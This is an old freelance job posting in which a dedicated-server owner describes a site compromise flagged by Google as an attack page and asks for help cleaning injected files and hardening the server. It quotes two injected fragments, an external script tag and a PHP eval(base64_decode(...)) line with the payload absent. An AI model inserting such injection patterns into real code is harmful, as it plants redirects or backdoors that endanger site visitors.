Server Has Been Compromised - Malware in my website files
$30-250 USD
In Progress
Posted about 14 years ago
Paid on delivery
Hi
I have a dedicated server. I have one website hosted on it. [login to view URL]
The website at [login to view URL] contains elements from the site [login to view URL], which appears to host malware
There are also errors in your statistics/logs/error_log file that may help you resolve this issue.
Many of my .php and .js files have been injected with a redirect script.
example 1 - <script src=[login to view URL] ></script><body>
example 2 -
<?php eval(base64_decode('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')); ?>
As a result, there is a Google warning for my website.
Warning - visiting this web site may harm your computer!
Reported Attack Page!
This web page at [login to view URL] has been reported as an attack page and has been blocked based on your security preferences.
Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.
Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
I need someone to liaise with me and be able to check the Apache log files and:
1. Identify the files, clean up the code, and remove the redirect script.
2. Secure the server so it does not get compromised again, and help me change the password etc.
3. Find out how my server was compromised, i.e. weak PHP code, and fix it etc.
You will need good PHP and server skills.
Only experienced people please.
I need my site up and running soon, ASAP.